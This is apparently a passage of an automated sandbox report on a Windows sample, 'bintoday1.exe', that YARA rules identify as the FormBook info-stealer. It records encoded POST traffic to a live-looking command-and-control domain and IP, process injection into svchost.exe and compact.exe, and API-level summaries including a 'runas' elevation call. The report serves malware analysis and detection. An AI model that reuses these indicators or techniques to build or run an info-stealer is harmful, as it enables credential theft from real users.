72 42 2f 4c 50 44 59 6f 6f 45 6a 6e 70 4b 72 45 30 44 6c 6c 46 33 64 61 4c 6c 57 70 58 33 30 6d 6a 31 44 61 37 62 58 70 4c 30 48 4c 54 59 72 2f 5a 4a 62 5a 67 39 35 6a 6d 59 77 30 6b 53 34 53 67 70 7a 75 32 6e 4c 2f 62 67 53 6a 67 6e 49 79 6d 73 32 72 74 4a 44 41 4d 65 75 7a 51 4e 52 68 38 6c 79 53 63 63 79 51 70 79 71 65 36 6b 66 55 45 76 6c 4f 73 48 66 33 58 71 49 50 71 50 55 43 44 58 37 36 65 66 Data Ascii: cLStcv3=XSoflE4IFwogBwnU8DT6B7R54/cypHnETwfl7wzs7+TvzDHGXiIEKtXzbWOFgYTADTfOPGrB/LPDYooEjnpKrE0DllF3daLlWpX30mj1Da7bXpL0HLTYr/ZJbZg95jmYw0kS4Sgpzu2nL/bgSjgnIyms2rtJDAMeuzQNRh8lySccyQpyqe6kfUEvlOsHf3XqIPqPUCDX76ef
Aug 29, 2024 12:25:43.969052076 CEST	1032	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Thu, 29 Aug 2024 10:25:43 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	49752	65.21.196.90	80	4176	C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:25:45.880811930 CEST	874	OUT	POST /jpse/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Length: 236 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.030002721.xyz Origin: http://www.030002721.xyz Referer: http://www.030002721.xyz/jpse/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E) Data Raw: 63 4c 53 74 63 76 33 3d 58 53 6f 66 6c 45 34 49 46 77 6f 67 41 51 58 55 2b 6b 48 36 57 4c 52 36 33 66 63 79 67 6e 6e 41 54 77 54 6c 37 30 69 70 37 4d 33 76 7a 6d 72 47 57 6a 49 45 45 4e 58 7a 4a 32 50 42 2f 49 54 4a 44 54 43 37 50 45 2f 42 2f 4c 7a 44 59 74 45 45 6a 55 52 4a 78 30 30 46 77 31 46 78 51 36 4c 6c 57 70 58 33 30 69 7a 54 44 62 54 62 58 35 37 30 42 71 54 62 33 76 5a 47 63 5a 67 39 39 6a 6d 63 77 30 6c 33 34 51 45 58 7a 73 4f 6e 4c 37 58 67 54 78 49 67 44 79 6d 69 70 37 73 6f 44 52 63 53 33 78 64 62 51 51 4d 44 6c 43 41 68 7a 6d 6f 6f 32 74 36 48 4e 45 6b 74 6c 4d 30 31 66 58 58 41 4b 50 53 50 47 56 50 77 30 4f 37 38 6a 76 33 58 71 4d 32 69 63 62 70 49 4c 54 6f 32 6e 69 53 78 55 41 3d 3d Data Ascii: cLStcv3=XSoflE4IFwogAQXU+kH6WLR63fcygnnATwTl70ip7M3vzmrGWjIEENXzJ2PB/ITJDTC7PE/B/LzDYtEEjURJx00Fw1FxQ6LlWpX30izTDbTbX570BqTb3vZGcZg99jmcw0l34QEXzsOnL7XgTxIgDymip7soDRcS3xdbQQMDlCAhzmoo2t6HNEktlM01fXXAKPSPGVPw0O78jv3XqM2icbpILTo2niSxUA==
Aug 29, 2024 12:25:46.534280062 CEST	1032	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Thu, 29 Aug 2024 10:25:46 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.6	49753	65.21.196.90	80

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:25:50.313653946 CEST	1887	OUT	POST /jpse/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Length: 1248 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.030002721.xyz Origin: http://www.030002721.xyz Referer: http://www.030002721.xyz/jpse/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E) Data Raw: 63 4c 53 74 63 76 33 3d 58 53 6f 66 6c 45 34 49 46 77 6f 67 41 51 58 55 2b 6b 48 36 57 4c 52 36 33 66 63 79 67 6e 6e 41 54 77 54 6c 37 30 69 70 37 4d 2f 76 7a 77 2f 47 58 41 67 45 46 4e 58 7a 53 32 50 43 2f 49 53 4c 44 54 4b 2f 50 45 79 30 2f 4e 2f 44 59 4c 51 45 6c 6c 52 4a 2f 45 30 46 79 31 46 77 64 61 4c 4b 57 70 48 7a 30 6d 58 54 44 62 54 62 58 36 6a 30 43 37 54 62 6e 66 5a 4a 62 5a 68 79 35 6a 6d 30 77 33 56 4e 34 51 51 48 79 59 36 6e 4c 62 48 67 52 46 6f 67 4f 79 6d 67 6f 37 73 4b 44 52 52 4d 33 78 42 66 51 51 34 39 6c 44 34 68 79 58 42 63 69 65 6d 6b 58 58 63 77 32 65 34 53 5a 44 61 78 48 2f 4b 6b 4e 45 6a 74 2b 64 54 43 36 72 6e 76 75 61 4f 75 66 34 56 47 4d 57 30 6b 75 78 43 2b 4c 58 39 74 67 36 44 4f 45 77 46 34 56 58 6c 59 43 30 68 76 57 73 2b 44 4f 62 6b 31 58 2b 37 39 45 78 63 62 6c 51 50 63 37 41 77 41 45 5a 74 55 64 48 6c 46 42 59 73 2b 54 4b 73 46 2f 59 79 6e 4a 2f 69 67 73 68 4b 6f 67 62 42 52 76 70 30 41 41 77 51 65 41 59 50 6e 55 7a 59 47 6d 36 33 33 4e 51 4b 79 46 32 74 70 73 30 [TRUNCATED] Data Ascii: cLStcv3=XSoflE4IFwogAQXU+kH6WLR63fcygnnATwTl70ip7M/vzw/GXAgEFNXzS2PC/ISLDTK/PEy0/N/DYLQEllRJ/E0Fy1FwdaLKWpHz0mXTDbTbX6j0C7TbnfZJbZhy5jm0w3VN4QQHyY6nLbHgRFogOymgo7sKDRRM3xBfQQ49lD4hyXBciemkXXcw2e4SZDaxH/KkNEjt+dTC6rnvuaOuf4VGMW0kuxC+LX9tg6DOEwF4VXlYC0hvWs+DObk1X+79ExcblQPc7AwAEZtUdHlFBYs+TKsF/YynJ/igshKogbBRvp0AAwQeAYPnUzYGm633NQKyF2tps0KJ/dS70xk+RGp7XYHZ+9ALdq5uQxwlxh5T/qYFQbcohQk+bJkF/Bf8g8y/3KQxN4p/nmYYemhnr73Jq+xCBUtzok557xB6fS5nL5rh6DEm3wZRsXo7yJ4FavnQuBi84uZIAkQ/q3O1yDAtg6vz9BzJtJKSPeMsu3J16vK8Leab+KJEkUi0iZLufLpArjnS9T3Z85PJa0CU5I/qWKiANem4aMprs+tZVnkubMfiFzh8H3sOLDD1gfaRue/079SbElP61zCZzcGl2o0ezhgMQDhdC7eXhMt4KMGjLbW5E9zHJjCBE9ztCTWjxZb2pgMp3GGrChYI4OggluYSd5jNG6pcj78xZ+AuGsNwfKZ46RxT538PZyjXOJpzE2cPooK4F3WfRUtT7Of562SNvrlqYKpxdMyMmA3h/UIOrm1xv94pj/M6pnn6IjNZQqiyOPKkJVJJEZNXN9tE1lZmLVwrhQiDHIcvvdIXhzTkHiJXhcXmUd1Nkf4WBTQVXE0FwwsMhexDrVk8VuNgU43rmIiN+jTCskycZLJkUPOFOXCvOebNjPPZSjJMKHfMmpw9CeXV6vyOspk1IkveEqzVL+bW3nB3VGxRsDk0HjDm6xb0mdgynoXIv1yzvZ7YZoRXquTIfsMNXuKjTXAe/Qg2ThJxFNlm7Qo/w28abnOr [TRUNCATED]
Aug 29, 2024 12:25:50.963126898 CEST	1032	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Thu, 29 Aug 2024 10:25:50 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Target ID:	0
Start time:	06:22:42
Start date:	29/08/2024
Path:	C:\Users\user\Desktop\bintoday1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\bintoday1.exe"
Imagebase:	0xb90000
File size:	1'274'880 bytes
MD5 hash:	99D47F7FC3F035DF01DC336375353E29
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	06:22:43
Start date:	29/08/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\bintoday1.exe"
Imagebase:	0x620000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2460538181.0000000002F00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2460538181.0000000002F00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2460077708.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2460077708.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2461015937.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2461015937.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:23:02
Start date:	29/08/2024
Path:	C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe"
Imagebase:	0x5f0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4023857362.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4023857362.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	06:23:04
Start date:	29/08/2024
Path:	C:\Windows\SysWOW64\compact.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\compact.exe"
Imagebase:	0xb80000
File size:	41'472 bytes
MD5 hash:	5CB107F69062D6D387F4F7A14737220E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4010508609.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4010508609.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4023622986.00000000009D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4023622986.00000000009D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4022626506.0000000000980000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4022626506.0000000000980000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	06:23:18
Start date:	29/08/2024
Path:	C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe"
Imagebase:	0x5f0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4026387029.0000000004F80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4026387029.0000000004F80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	06:23:30
Start date:	29/08/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff728280000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.3%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	2.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	62

Executed Functions

Function 00B942DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00B9430D

Part of subcall function 00B96B57: _wcslen.LIBCMT ref: 00B96B6A

GetCurrentProcess.KERNEL32(?,00C2CB64,00000000,?,?), ref: 00B94422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00B94429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00B94454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00B94466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00B94474
FreeLibrary.KERNEL32(00000000,?,?), ref: 00B9447B
GetSystemInfo.KERNEL32(?,?,?), ref: 00B944A0

Strings

GetNativeSystemInfo, xrefs: 00B94460
|O, xrefs: 00BD36F8
kernel32.dll, xrefs: 00B9444F

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: fb5027e683237ba800bb11721149c52f8e352b7b3a230445a264cba41e52364f
Instruction ID: def125470eb996afcd5bde5407d06639d30d2e87b2a4be8223ad0d79be36d8e5
Opcode Fuzzy Hash: fb5027e683237ba800bb11721149c52f8e352b7b3a230445a264cba41e52364f
Instruction Fuzzy Hash: D4A1626595A2C0DFCB31CB6A788179D7FE4AB36702B1C54F9D84393B32D6A04A05CB62

Function 00B942A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00B950AA,?,?,00000000,00000000), ref: 00B942B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00B950AA,?,?,00000000,00000000), ref: 00B942C9
LoadResource.KERNEL32(?,00000000,?,?,00B950AA,?,?,00000000,00000000,?,?,?,?,?,?,00B94F20), ref: 00BD35BE
SizeofResource.KERNEL32(?,00000000,?,?,00B950AA,?,?,00000000,00000000,?,?,?,?,?,?,00B94F20), ref: 00BD35D3
LockResource.KERNEL32(00B950AA,?,?,00B950AA,?,?,00000000,00000000,?,?,?,?,?,?,00B94F20,?), ref: 00BD35E6

Strings

SCRIPT, xrefs: 00B942BF

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: b8a86ca5f4c35ccf98bba34343f9e7d480f657a5bc51e501732515085bc6c4d5
Instruction ID: 71e23e9f732c553f93c75848d62088e0066d89c141aa5ee89c016c36400e776f
Opcode Fuzzy Hash: b8a86ca5f4c35ccf98bba34343f9e7d480f657a5bc51e501732515085bc6c4d5
Instruction Fuzzy Hash: B5117C70210700BFEB258B65EC88F2B7BB9EFC5B51F2081A9B41296690EB71D8058630

Function 00BD2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 00B92B6B

Part of subcall function 00B93A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00C61418,?,00B92E7F,?,?,?,00000000), ref: 00B93A78

Part of subcall function 00B99CB3: _wcslen.LIBCMT ref: 00B99CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,00C52224), ref: 00BD2C10
ShellExecuteW.SHELL32(00000000,?,?,00C52224), ref: 00BD2C17

Strings

runas, xrefs: 00BD2C0B

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: 4d4608c99f563b45ff57d34ae66bbe81e630447197a921f05c1bd3fd89d27789
Instruction ID: c3bfbc0599ac0280daad49c8ea2e004aa356dbfe58455959d7fec00cd208c434
Opcode Fuzzy Hash: 4d4608c99f563b45ff57d34ae66bbe81e630447197a921f05c1bd3fd89d27789
Instruction Fuzzy Hash: BC11B1316083416ACF24FF64D892ABEB7E49FA1752F4844BDF582530A2DF618A4A8712

Function 00BFDBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00BD5222), ref: 00BFDBCE
GetFileAttributesW.KERNELBASE(?), ref: 00BFDBDD
FindFirstFileW.KERNELBASE(?,?), ref: 00BFDBEE
FindClose.KERNEL32(00000000), ref: 00BFDBFA

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 91c95a6b4c2005706cffd3b9f45e33622d6db361f4d45d9b3019226dc8167706
Instruction ID: fc5e3ae5c88f487ff78b974416dd709ac18f21b46fd1c5ad3d1c539357a508b4
Opcode Fuzzy Hash: 91c95a6b4c2005706cffd3b9f45e33622d6db361f4d45d9b3019226dc8167706
Instruction Fuzzy Hash: A2F0A0308209189783306B7CAC4EABE37ADDE11334B104B42F976C24F0EFB0595A86D5

